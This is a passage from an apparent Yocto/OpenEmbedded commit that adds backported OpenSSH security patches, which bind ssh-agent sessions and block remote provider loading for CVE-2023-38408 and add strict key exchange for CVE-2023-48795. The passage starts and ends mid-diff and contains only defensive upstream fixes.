++check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
++{
++ if (parse_userauth_request(data, key, NULL, NULL) == 0) {
++ debug("%s: signed data matches public key userauth request", __func__);
+ return 1;
++ }
++ if (parse_sshsig_request(data) == 0) {
++ debug("%s: signed data matches SSHSIG signature request", __func__);
++ return 1;
++ }
+
+- /* XXX CA signature operation */
++ /* XXX check CA signature operation */
+
+ error("web-origin key attempting to sign non-SSH message");
+ return 0;
+@@ -367,21 +427,22 @@ check_websafe_message_contents(struct sshkey *key,
+ static void
+ process_sign_request2(SocketEntry *e)
+ {
+- const u_char *data;
+ u_char *signature = NULL;
+- size_t dlen, slen = 0;
++ size_t i, slen = 0;
+ u_int compat = 0, flags;
+ int r, ok = -1;
+ char *fp = NULL;
+- struct sshbuf *msg;
++ struct sshbuf *msg = NULL, *data = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+
+- if ((msg = sshbuf_new()) == NULL)
++ debug("%s: entering", __func__);
++
++	if ((msg = sshbuf_new()) == NULL || (data = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0 ||
+- (r = sshbuf_get_string_direct(e->request, &data, &dlen)) != 0 ||
++ (r = sshbuf_get_stringb(e->request, data)) != 0 ||
+ (r = sshbuf_get_u32(e->request, &flags)) != 0) {
+ error("%s: couldn't parse request: %s", __func__, ssh_err(r));
+ goto send;
+@@ -391,13 +452,13 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id) != 0) {
++ if (id->confirm && confirm_key(id, NULL) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+ if (sshkey_is_sk(id->key)) {
+ if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
+- !check_websafe_message_contents(key, data, dlen)) {
++ !check_websafe_message_contents(key, data)) {
+ /* error already logged */
+ goto send;
+ }
+@@ -411,7 +472,7 @@ process_sign_request2(SocketEntry *e)
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+- data, dlen, agent_decode_alg(key, flags),
++ sshbuf_ptr(data), sshbuf_len(data), agent_decode_alg(key, flags),
+ id->sk_provider, compat)) != 0) {
+ error("%s: sshkey_sign: %s", __func__, ssh_err(r));
+ goto send;
+@@ -420,8 +481,7 @@ process_sign_request2(SocketEntry *e)
+ ok = 0;
+ send:
+ notify_complete(notifier);
+- sshkey_free(key);
+- free(fp);
++
+ if (ok == 0) {
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_SIGN_RESPONSE)) != 0 ||
+ (r = sshbuf_put_string(msg, signature, slen)) != 0)
+@@ -432,7 +492,10 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(data);
+ sshbuf_free(msg);
++ sshkey_free(key);
++ free(fp);
+ free(signature);
+ }
+
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
new file mode 100644
index 0000000000..b519ccce42
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
@@ -0,0 +1,38 @@
+From 7adba46611e5d076d7d12d9f4162dd4cabd5ff50 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:28:10 +0000
+Subject: [PATCH 09/12] upstream: give typedef'd struct a struct name; makes
+ the fuzzer I'm
+
+writing a bit easier
+
+OpenBSD-Commit-ID: 1052ab521505a4d8384d67acb3974ef81b8896cb
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/8afaa7d7918419d3da6c0477b83db2159879cb33]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7ad323c..c99927c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -108,7 +108,7 @@ typedef enum {
+ AUTH_CONNECTION
+ } sock_type;
+
+-typedef struct {
++typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
new file mode 100644
index 0000000000..27b2eadfae
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
@@ -0,0 +1,39 @@
+From 343e2a2c0ef754a7a86118016b248f7a73f8d510 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:29:46 +0000
+Subject: [PATCH 10/12] upstream: fix the values of enum sock_type
+
+OpenBSD-Commit-ID: 18d048f4dbfbb159ff500cfc2700b8fb1407facd
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1a4b92758690faa12f49079dd3b72567f909466d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index c99927c..7f1e14b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -103,9 +103,9 @@
+ #define AGENT_RBUF_LEN (4096)
+
+ typedef enum {
+- AUTH_UNUSED,
+- AUTH_SOCKET,
+- AUTH_CONNECTION
++ AUTH_UNUSED = 0,
++ AUTH_SOCKET = 1,
++ AUTH_CONNECTION = 2,
+ } sock_type;
+
+ typedef struct socket_entry {
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
new file mode 100644
index 0000000000..c300393ebf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
@@ -0,0 +1,307 @@
+From 2b3b369c8cf71f9ef5942a5e074e6f86e7ca1e0c Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Sun, 19 Dec 2021 22:09:23 +0000
+Subject: [PATCH 11/12] upstream: ssh-agent side of binding
+
+record session ID/hostkey/forwarding status for each active socket.
+
+Attempt to parse data-to-be-signed at signature request time and extract
+session ID from the blob if it is a pubkey userauth request.
+
+ok markus@
+
+OpenBSD-Commit-ID: a80fd41e292b18b67508362129e9fed549abd318
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/4c1e3ce85e183a9d0c955c88589fed18e4d6a058]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ authfd.h | 3 +
+ ssh-agent.c | 175 +++++++++++++++++++++++++++++++++++++++++++++++++---
+ 2 files changed, 170 insertions(+), 8 deletions(-)
+
+diff --git a/authfd.h b/authfd.h
+index c3bf625..9cc9807 100644
+--- a/authfd.h
++++ b/authfd.h
+@@ -76,6 +76,9 @@ int ssh_agent_sign(int sock, const struct sshkey *key,
+ #define SSH2_AGENTC_ADD_ID_CONSTRAINED 25
+ #define SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED 26
+
++/* generic extension mechanism */
++#define SSH_AGENTC_EXTENSION 27
++
+ #define SSH_AGENT_CONSTRAIN_LIFETIME 1
+ #define SSH_AGENT_CONSTRAIN_CONFIRM 2
+ #define SSH_AGENT_CONSTRAIN_MAXSIGN 3
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7f1e14b..01c7f2b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -98,9 +98,15 @@
+ #endif
+
+ /* Maximum accepted message length */
+-#define AGENT_MAX_LEN (256*1024)
++#define AGENT_MAX_LEN (256*1024)
+ /* Maximum bytes to read from client socket */
+-#define AGENT_RBUF_LEN (4096)
++#define AGENT_RBUF_LEN (4096)
++/* Maximum number of recorded session IDs/hostkeys per connection */
++#define AGENT_MAX_SESSION_IDS 16
++/* Maximum size of session ID */
++#define AGENT_MAX_SID_LEN 128
++
++/* XXX store hostkey_sid in a refcounted tree */
+
+ typedef enum {
+ AUTH_UNUSED = 0,
+@@ -108,12 +114,20 @@ typedef enum {
+ AUTH_CONNECTION = 2,
+ } sock_type;
+
++struct hostkey_sid {
++ struct sshkey *key;
++ struct sshbuf *sid;
++ int forwarded;
++};
++
+ typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+ struct sshbuf *output;
+ struct sshbuf *request;
++ size_t nsession_ids;
++ struct hostkey_sid *session_ids;
+ } SocketEntry;
+
+ u_int sockets_alloc = 0;
+@@ -174,10 +188,17 @@ static int restrict_websafe = 1;
+ static void
+ close_socket(SocketEntry *e)
+ {
++ size_t i;
++
+ close(e->fd);
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ for (i = 0; i < e->nsession_ids; i++) {
++ sshkey_free(e->session_ids[i].key);
++ sshbuf_free(e->session_ids[i].sid);
++ }
++ free(e->session_ids);
+ memset(e, '\0', sizeof(*e));
+ e->fd = -1;
+ e->type = AUTH_UNUSED;
+@@ -423,6 +444,18 @@ check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
+ return 0;
+ }
+
++static int
++buf_equal(const struct sshbuf *a, const struct sshbuf *b)
++{
++ if (sshbuf_ptr(a) == NULL || sshbuf_ptr(b) == NULL)
++ return SSH_ERR_INVALID_ARGUMENT;
++ if (sshbuf_len(a) != sshbuf_len(b))
++ return SSH_ERR_INVALID_FORMAT;
++ if (timingsafe_bcmp(sshbuf_ptr(a), sshbuf_ptr(b), sshbuf_len(a)) != 0)
++ return SSH_ERR_INVALID_FORMAT;
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -431,8 +464,8 @@ process_sign_request2(SocketEntry *e)
+ size_t i, slen = 0;
+ u_int compat = 0, flags;
+ int r, ok = -1;
+- char *fp = NULL;
+- struct sshbuf *msg = NULL, *data = NULL;
++ char *fp = NULL, *user = NULL, *sig_dest = NULL;
++ struct sshbuf *msg = NULL, *data = NULL, *sid = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+@@ -452,7 +485,33 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id, NULL) != 0) {
++ /*
++ * If session IDs were recorded for this socket, then use them to
++ * annotate the confirmation messages with the host keys.
++ */
++ if (e->nsession_ids > 0 &&
++ parse_userauth_request(data, key, &user, &sid) == 0) {
++ /*
++ * session ID from userauth request should match the final
++ * ID in the list recorded in the socket, unless the ssh
++ * client at that point lacks the binding extension (or if
++ * an attacker is trying to steal use of the agent).
++ */
++ i = e->nsession_ids - 1;
++ if (buf_equal(sid, e->session_ids[i].sid) == 0) {
++ if ((fp = sshkey_fingerprint(e->session_ids[i].key,
++ SSH_FP_HASH_DEFAULT, SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ debug3("%s: destination %s %s (slot %zu)", __func__,
++ sshkey_type(e->session_ids[i].key), fp, i);
++ xasprintf(&sig_dest, "public key request for "
++ "target user \"%s\" to %s %s", user,
++ sshkey_type(e->session_ids[i].key), fp);
++ free(fp);
++ fp = NULL;
++ }
++	}
++ if (id->confirm && confirm_key(id, sig_dest) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+@@ -467,8 +526,10 @@ process_sign_request2(SocketEntry *e)
+ SSH_FP_DEFAULT)) == NULL)
+ fatal("%s: fingerprint failed", __func__);
+ notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ "Confirm user presence for key %s %s%s%s",
++ sshkey_type(id->key), fp,
++ sig_dest == NULL ? "" : "\n",
++ sig_dest == NULL ? "" : sig_dest);
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+@@ -492,11 +553,14 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(sid);
+ sshbuf_free(data);
+ sshbuf_free(msg);
+ sshkey_free(key);
+ free(fp);
+ free(signature);
++ free(sig_dest);
++ free(user);
+ }
+
+ /* shared */
+@@ -925,6 +989,98 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
++static int
++process_ext_session_bind(SocketEntry *e)
++{
++ int r, sid_match, key_match;
++ struct sshkey *key = NULL;
++ struct sshbuf *sid = NULL, *sig = NULL;
++ char *fp = NULL;
++ u_char fwd;
++ size_t i;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshkey_froms(e->request, &key)) != 0 ||
++ (r = sshbuf_froms(e->request, &sid)) != 0 ||
++ (r = sshbuf_froms(e->request, &sig)) != 0 ||
++ (r = sshbuf_get_u8(e->request, &fwd)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto out;
++ }
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ /* check signature with hostkey on session ID */
++ if ((r = sshkey_verify(key, sshbuf_ptr(sig), sshbuf_len(sig),
++ sshbuf_ptr(sid), sshbuf_len(sid), NULL, 0, NULL)) != 0) {
++ error("%s: sshkey_verify for %s %s: %s", __func__, sshkey_type(key), fp, ssh_err(r));
++ goto out;
++ }
++ /* check whether sid/key already recorded */
++ for (i = 0; i < e->nsession_ids; i++) {
++ sid_match = buf_equal(sid, e->session_ids[i].sid) == 0;
++ key_match = sshkey_equal(key, e->session_ids[i].key);
++ if (sid_match && key_match) {
++ debug("%s: session ID already recorded for %s %s", __func__,
++ sshkey_type(key), fp);
++ r = 0;
++ goto out;
++ } else if (sid_match) {
++ error("%s: session ID recorded against different key "
++ "for %s %s", __func__, sshkey_type(key), fp);
++ r = -1;
++ goto out;
++ }
++ /*
++ * new sid with previously-seen key can happen, e.g. multiple
++ * connections to the same host.
++ */
++ }
++ /* record new key/sid */
++ if (e->nsession_ids >= AGENT_MAX_SESSION_IDS) {
++ error("%s: too many session IDs recorded", __func__);
++ goto out;
++ }
++ e->session_ids = xrecallocarray(e->session_ids, e->nsession_ids,
++ e->nsession_ids + 1, sizeof(*e->session_ids));
++ i = e->nsession_ids++;
++ debug("%s: recorded %s %s (slot %zu of %d)", __func__, sshkey_type(key), fp, i,
++ AGENT_MAX_SESSION_IDS);
++ e->session_ids[i].key = key;
++ e->session_ids[i].forwarded = fwd != 0;
++ key = NULL; /* transferred */
++ /* can't transfer sid; it's refcounted and scoped to request's life */
++ if ((e->session_ids[i].sid = sshbuf_new()) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ if ((r = sshbuf_putb(e->session_ids[i].sid, sid)) != 0)
++ fatal("%s: sshbuf_putb session ID: %s", __func__, ssh_err(r));
++ /* success */
++ r = 0;
++ out:
++ sshkey_free(key);
++ sshbuf_free(sid);
++ sshbuf_free(sig);
++ return r == 0 ? 1 : 0;
++}
++
++static void
++process_extension(SocketEntry *e)
++{
++ int r, success = 0;
++ char *name;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshbuf_get_cstring(e->request, &name, NULL)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto send;
++ }
++ if (strcmp(name, "session-bind@openssh.com") == 0)
++ success = process_ext_session_bind(e);
++ else
++ debug("%s: unsupported extension \"%s\"", __func__, name);
++send:
++ send_status(e, success);
++}
+ /*
+ * dispatch incoming message.
+ * returns 1 on success, 0 for incomplete messages or -1 on error.
+@@ -1019,6 +1175,9 @@ process_message(u_int socknum)
+ process_remove_smartcard_key(e);
+ break;
+ #endif /* ENABLE_PKCS11 */
++ case SSH_AGENTC_EXTENSION:
++ process_extension(e);
++ break;
+ default:
+ /* Unknown message. Respond with failure. */
+ error("Unknown message %d", type);
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
new file mode 100644
index 0000000000..934775bdec
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
@@ -0,0 +1,120 @@
+From 4fe3d0fbd3d6dc1f19354e0d73a3231c461ed044 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:56:33 +0000
+Subject: [PATCH 12/12] upstream: Disallow remote addition of FIDO/PKCS11
+ provider libraries to ssh-agent by default.
+
+The old behaviour of allowing remote clients from loading providers
+can be restored using `ssh-agent -O allow-remote-pkcs11`.
+
+Detection of local/remote clients requires a ssh(1) that supports
+the `session-bind@openssh.com` extension. Forwarding access to a
+ssh-agent socket using non-OpenSSH tools may circumvent this control.
+
+ok markus@
+
+OpenBSD-Commit-ID: 4c2bdf79b214ae7e60cc8c39a45501344fa7bd7c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1f2731f5d7a8f8a8385c6031667ed29072c0d92a]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.1 | 20 ++++++++++++++++++++
+ ssh-agent.c | 26 ++++++++++++++++++++++++--
+ 2 files changed, 44 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.1 b/ssh-agent.1
+index fff0db6..a0f1e21 100644
+--- a/ssh-agent.1
++++ b/ssh-agent.1
+@@ -97,6 +97,26 @@ The default is
+ Kill the current agent (given by the
+ .Ev SSH_AGENT_PID
+ environment variable).
++.It Fl O Ar option
++Specify an option when starting
++.Nm .
++Currently two options are supported:
++.Cm allow-remote-pkcs11
++and
++.Cm no-restrict-websafe .
++.Pp
++The
++.Cm allow-remote-pkcs11
++option allows clients of a forwarded
++.Nm
++to load PKCS#11 or FIDO provider libraries.
++By default only local clients may perform this operation.
++Note that signalling that a
++.Nm
++client is remote is performed by
++.Xr ssh 1 ,
++and use of other tools to forward access to the agent socket may circumvent
++this restriction.
+ .It Fl P Ar provider_whitelist
+ Specify a pattern-list of acceptable paths for PKCS#11 and FIDO authenticator
+ shared libraries that may be used with the
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 01c7f2b..40c1b6b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.300 2023/07/19 13:56:33 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -167,6 +167,12 @@ char socket_dir[PATH_MAX];
+ /* PKCS#11/Security key path whitelist */
+ static char *provider_whitelist;
+
++/*
++ * Allows PKCS11 providers or SK keys that use non-internal providers to
++ * be added over a remote connection (identified by session-bind@openssh.com).
++ */
++static int remote_add_provider;
++
+ /* locking */
+ #define LOCK_SIZE 32
+ #define LOCK_SALT_SIZE 16
+@@ -736,6 +742,15 @@ process_add_identity(SocketEntry *e)
+ if (strcasecmp(sk_provider, "internal") == 0) {
+ debug("%s: internal provider", __func__);
+ } else {
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed add of SK provider \"%.100s\": "
++ "remote addition of providers is disabled",
++ sk_provider);
++ free(sk_provider);
++ free(comment);
++ sshkey_free(k);
++ goto send;
++ }
+ if (realpath(sk_provider, canonical_provider) == NULL) {
+ verbose("failed provider \"%.100s\": "
+ "realpath: %s", sk_provider,
+@@ -901,6 +916,11 @@ process_add_smartcard_key(SocketEntry *e)
+ goto send;
+ }
+ }
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed PKCS#11 add of \"%.100s\": remote addition of "
++ "providers is disabled", provider);
++ goto send;
++ }
+ if (realpath(provider, canonical_provider) == NULL) {
+ verbose("failed PKCS#11 add of \"%.100s\": realpath: %s",
+ provider, strerror(errno));
+@@ -1556,7 +1576,9 @@ main(int ac, char **av)
+ break;
+ case 'O':
+ if (strcmp(optarg, "no-restrict-websafe") == 0)
+- restrict_websafe = 0;
++ restrict_websafe = 0;
++ else if (strcmp(optarg, "allow-remote-pkcs11") == 0)
++ remote_add_provider = 1;
+ else
+ fatal("Unknown -O option");
+ break;
+--
+2.41.0
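To make the behavioural change above concrete, here is a minimal, self-contained sketch of the gating logic; the names allow_remote_providers and client_has_session_ids are illustrative stand-ins, not the actual ssh-agent symbols:

    /* Sketch: refuse to load a PKCS#11/FIDO provider when the request arrives
     * over a forwarded agent connection, unless the (hypothetical) override
     * corresponding to -O allow-remote-pkcs11 was set. */
    #include <stdio.h>

    static int allow_remote_providers = 0;   /* set by the -O override */

    static int provider_load_permitted(int client_has_session_ids)
    {
        /* A non-zero session-id count means ssh(1) marked this client as
         * remote via the session-bind@openssh.com extension. */
        if (client_has_session_ids && !allow_remote_providers) {
            fprintf(stderr, "refusing provider load from remote client\n");
            return 0;
        }
        return 1;
    }

    int main(void)
    {
        printf("local client:  %d\n", provider_load_permitted(0)); /* 1 */
        printf("remote client: %d\n", provider_load_permitted(1)); /* 0 */
        return 0;
    }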
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
new file mode 100644
index 0000000000..57c45e3d93
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
@@ -0,0 +1,468 @@
+(modified to not remove ssh_packet_read_expect(), to add to
+KexAlgorithms in sshd.c and sshconnect2.c as this version pre-dates
+kex_proposal_populate_entries(), replace debug*_f() with debug*(),
+error*_f() with error*(), and fatal_f() with fatal())
+
+Backport of:
+
+From 1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:45:17 +0000
+Subject: [PATCH] upstream: implement "strict key exchange" in ssh and sshd
+
+This adds a protocol extension to improve the integrity of the SSH
+transport protocol, particularly in and around the initial key exchange
+(KEX) phase.
+
+Full details of the extension are in the PROTOCOL file.
+
+with markus@
+
+OpenBSD-Commit-ID: 2a66ac962f0a630d7945fee54004ed9e9c439f14
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/CVE-2023-48795.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5]
+CVE: CVE-2023-48795
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ PROTOCOL | 26 +++++++++++++++++
+ kex.c | 68 +++++++++++++++++++++++++++++++++-----------
+ kex.h | 1 +
+ packet.c | 78 ++++++++++++++++++++++++++++++++++++++-------------
+ sshconnect2.c | 14 +++------
+ sshd.c | 7 +++--
+ 6 files changed, 146 insertions(+), 48 deletions(-)
+
+diff --git a/PROTOCOL b/PROTOCOL
+index f75c1c0..89bddfe 100644
+--- a/PROTOCOL
++++ b/PROTOCOL
+@@ -102,6 +102,32 @@ OpenSSH supports the use of ECDH in Curve25519 for key exchange as
+ described at:
+ http://git.libssh.org/users/aris/libssh.git/plain/doc/curve25519-sha256@libssh.org.txt?h=curve25519
+
++1.9 transport: strict key exchange extension
++
++OpenSSH supports a number of transport-layer hardening measures under
++a "strict KEX" feature. This feature is signalled similarly to the
++RFC8308 ext-info feature: by including a additional algorithm in the
++initiial SSH2_MSG_KEXINIT kex_algorithms field. The client may append
++"kex-strict-c-v00@openssh.com" to its kex_algorithms and the server
++may append "kex-strict-s-v00@openssh.com". These pseudo-algorithms
++are only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored
++if they are present in subsequent SSH2_MSG_KEXINIT packets.
++
++When an endpoint that supports this extension observes this algorithm
++name in a peer's KEXINIT packet, it MUST make the following changes to
++the the protocol:
++
++a) During initial KEX, terminate the connection if any unexpected or
++ out-of-sequence packet is received. This includes terminating the
++ connection if the first packet received is not SSH2_MSG_KEXINIT.
++ Unexpected packets for the purpose of strict KEX include messages
++ that are otherwise valid at any time during the connection such as
++ SSH2_MSG_DEBUG and SSH2_MSG_IGNORE.
++b) After sending or receiving a SSH2_MSG_NEWKEYS message, reset the
++ packet sequence number to zero. This behaviour persists for the
++ duration of the connection (i.e. not just the first
++ SSH2_MSG_NEWKEYS).
++
+ 2. Connection protocol changes
+
+ 2.1. connection: Channel write close extension "eow@openssh.com"
+diff --git a/kex.c b/kex.c
+index ce85f04..3129a4e 100644
+--- a/kex.c
++++ b/kex.c
+@@ -63,7 +63,7 @@
+ #include "digest.h"
+
+ /* prototype */
+-static int kex_choose_conf(struct ssh *);
++static int kex_choose_conf(struct ssh *, uint32_t seq);
+ static int kex_input_newkeys(int, u_int32_t, struct ssh *);
+
+ static const char *proposal_names[PROPOSAL_MAX] = {
+@@ -173,6 +173,18 @@ kex_names_valid(const char *names)
+ return 1;
+ }
+
++/* returns non-zero if proposal contains any algorithm from algs */
++static int
++has_any_alg(const char *proposal, const char *algs)
++{
++ char *cp;
++
++ if ((cp = match_list(proposal, algs, NULL)) == NULL)
++ return 0;
++ free(cp);
++ return 1;
++}
++
+ /*
+ * Concatenate algorithm names, avoiding duplicates in the process.
+ * Caller must free returned string.
+@@ -180,7 +192,7 @@ kex_names_valid(const char *names)
+ char *
+ kex_names_cat(const char *a, const char *b)
+ {
+- char *ret = NULL, *tmp = NULL, *cp, *p, *m;
++ char *ret = NULL, *tmp = NULL, *cp, *p;
+ size_t len;
+
+ if (a == NULL || *a == '\0')
+@@ -197,10 +209,8 @@ kex_names_cat(const char *a, const char *b)
+ }
+ strlcpy(ret, a, len);
+ for ((p = strsep(&cp, ",")); p && *p != '\0'; (p = strsep(&cp, ","))) {
+- if ((m = match_list(ret, p, NULL)) != NULL) {
+- free(m);
++ if (has_any_alg(ret, p))
+ continue; /* Algorithm already present */
+- }
+ if (strlcat(ret, ",", len) >= len ||
+ strlcat(ret, p, len) >= len) {
+ free(tmp);
+@@ -409,7 +419,12 @@ kex_protocol_error(int type, u_int32_t seq, struct ssh *ssh)
+ {
+ int r;
+
+- error("kex protocol error: type %d seq %u", type, seq);
++ /* If in strict mode, any unexpected message is an error */
++ if ((ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict) {
++ ssh_packet_disconnect(ssh, "strict KEX violation: "
++ "unexpected packet type %u (seqnr %u)", type, seq);
++ }
++ error("type %u seq %u", type, seq);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_UNIMPLEMENTED)) != 0 ||
+ (r = sshpkt_put_u32(ssh, seq)) != 0 ||
+ (r = sshpkt_send(ssh)) != 0)
+@@ -481,6 +496,11 @@ kex_input_ext_info(int type, u_int32_t seq, struct ssh *ssh)
+ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &kex_protocol_error);
+ if ((r = sshpkt_get_u32(ssh, &ninfo)) != 0)
+ return r;
++ if (ninfo >= 1024) {
++ error("SSH2_MSG_EXT_INFO with too many entries, expected "
++ "<=1024, received %u", ninfo);
++ return dispatch_protocol_error(type, seq, ssh);
++ }
+ for (i = 0; i < ninfo; i++) {
+ if ((r = sshpkt_get_cstring(ssh, &name, NULL)) != 0)
+ return r;
+@@ -581,7 +601,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ error("%s: no hex", __func__);
+ return SSH_ERR_INTERNAL_ERROR;
+ }
+- ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, NULL);
++ ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, &kex_protocol_error);
+ ptr = sshpkt_ptr(ssh, &dlen);
+ if ((r = sshbuf_put(kex->peer, ptr, dlen)) != 0)
+ return r;
+@@ -617,7 +637,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ if (!(kex->flags & KEX_INIT_SENT))
